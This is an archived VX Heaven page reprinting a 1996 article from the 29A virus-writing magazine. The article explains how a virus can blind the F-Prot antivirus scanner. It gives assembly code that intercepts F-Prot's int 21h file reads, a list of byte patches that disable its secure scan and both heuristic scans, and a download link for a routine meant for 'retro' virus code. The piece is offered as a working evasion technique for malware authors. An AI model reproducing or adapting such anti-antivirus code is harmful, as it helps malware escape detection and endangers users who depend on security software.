VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Chilling Fridrik

Blade Runner
29a [1]
December 1996

[Back to index] [Comments]

The reason of writing this article is that i realised that i've never seen how to fool F-Prot in any virus magazine... and as i like to be original, i decided to have a look at it and try to do some modifications in its code so it won't detect any virus... and i got it :)

And believe me that it's quite easy to do... just keep reading the article and try it by yourself following the next steps :)

Ok, F-Prot, unlike TbScan, uses int 21h for opening, reading, and so on, that is, for scanning files for any infection. When it reads from a file, it does it holding the next values:


Since we know this, it's very easy for us to intercept this kind of calls to the int 21h with something like this:

	cmp ax,3f00h
	jne jump_back

	cmp bx,8
	jne jump_back

	cmp cx,800h
	je fprot_read

	db 0eah
old_int_21h dw ?,?

Once we know that it's a F-Prot read, we can start doing our work... the unique things we must do for it to don't detect absolutely anything is to bypass the secure scan and the two types of heuristic scanning it uses. Let's see the way in which we can do this thingy :)

Secure method

>7519		JNZ 0123 <<< change this for JZ
C41E502D	LES BX,[2D50]
26		ES:
>750E		JNZ 0123 <<< change this for JZ
9AF500C136	CALL 36C1:00F5

C706D64B0000	MOV WORD PTR [4BD6],0000
C706D44B0000	MOV WORD PTR [4BD4],0000
C41E502D	LES BX,[2D50]
26		ES:
>803FFF		CMP BYTE PTR [BX],4D <<< change 4dh for 0ffh
750B		JNZ 0121
C41E502D	LES BX,[2D50]
26		ES:
807F015A	CMP BYTE PTR [BX+01],5A
742A		JZ 014B

First heuristic

9A2605AF1F	CALL 1FAF:0526
>740E		JZ 0117 <<< change this for jnz
FF36E43D	PUSH [3DE4]
9A0000794A	CALL 4A79:0000

Second heuristic

833EBF5500	CMP WORD PTR [55BF],+00
>7402		JZ 0109 <<< change this for jnz
EB32		JMP 013B
81FE8713	CMP SI,1387
7524		JNZ 0133

And that's all, folks... since this five bytes have been changed, F-Prot will NOT detect any virus. As a last thing i'll include the complete routine, though it's a trivial thing, so you can implement it in your retro code; as i always use debug for coding, i think you'll have to adapt it, but anyway... :)

And don't ask me why do i always use debug for coding instead the traditional .ASM text file and TASM or A86... :)

Download na-fp.scr (0.6K)

                                    Blade Runner/29A
                                    Los Angeles, 2019
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka